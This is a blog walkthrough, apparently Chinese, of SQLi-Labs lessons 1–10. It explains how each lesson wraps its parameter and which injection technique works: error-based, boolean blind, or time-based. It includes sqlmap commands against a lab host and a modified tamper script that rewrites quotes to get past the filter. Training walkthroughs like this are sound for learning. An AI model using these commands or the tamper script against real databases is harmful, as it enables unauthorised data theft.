sqlilab less1-less10

less-1

参数被单引号包裹，加单引号，闭合后绕过

less-2

参数没有被包裹，直接带入查询,不需要闭合

less-3

参数被

('$id')

包裹，需要将他闭合

less-4

参数被小括号和双引号包裹，先对id进行处理，两边加上双引号，再带入查询，需要将其闭合

less-5

查询结果将mysql_error()返回前端，报错注入。需要先将前边进行闭合，再进行注入。

less-6

同样将报错信息返回前端，参数用双引号包裹

less-7

这里的报错内容被注释掉，如果正确的话返回的是一个，错误的话返回另一个，可以通过left，substr等函数来判断内容

less-8

正确的话有内容返回，错误的话无内容，参数无包裹。and函数必须两边均为True，返回正确

if为判断，ascii为转为acsii码，substr为选择内容

python .\sqlmap.py -u http://sqli.com/Less-8/?id=1 --dbs --technique B

less-9

返回的内容一样时，只能基于时间注入，通过sleep函数，在less-8上加上sleep

python .\sqlmap.py -u http://sqli.com/Less-9/?id=1 --dbs --technique T

less-10

双引号包裹的时间盲注，同less-9。

这部分使用sqlmap看了好多文章，都是说sqlmap可以直接跑，但是我没有成功。这里的闭合是双引号闭合，通过分析sqlmap的攻击语句是

通过修改sqlmap的一个单引号转utf-8的tamper脚本，将单引号替换为双引号，注入成功

 1 #!/usr/bin/env python

 2

 3 """

 4 Copyright (c) 2006-2020 sqlmap developers (http://sqlmap.org/)

 5 See the file 'LICENSE' for copying permission

 6 """

 7

 8 from lib.core.enums import PRIORITY

 9

10 __priority__ = PRIORITY.LOWEST

11

12

13 def dependencies():

14     pass

15

16

17 def tamper(payload, **kwargs):

18     """

19     Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)

20

21     References:

22         * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128

23         * http://lukasz.pilorz.net/testy/unicode_conversion/

24         * http://sla.ckers.org/forum/read.php?13,11562,11850

25         * http://lukasz.pilorz.net/testy/full_width_utf/index.phps

26

27     >>> tamper("1 AND '1'='1")

28     '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'

29     """

30

31     return payload.replace('\'', "%22") if payload else payload

再或者指定prefix参数

巴特西

sqlilab less1-less10

最新文章

热门文章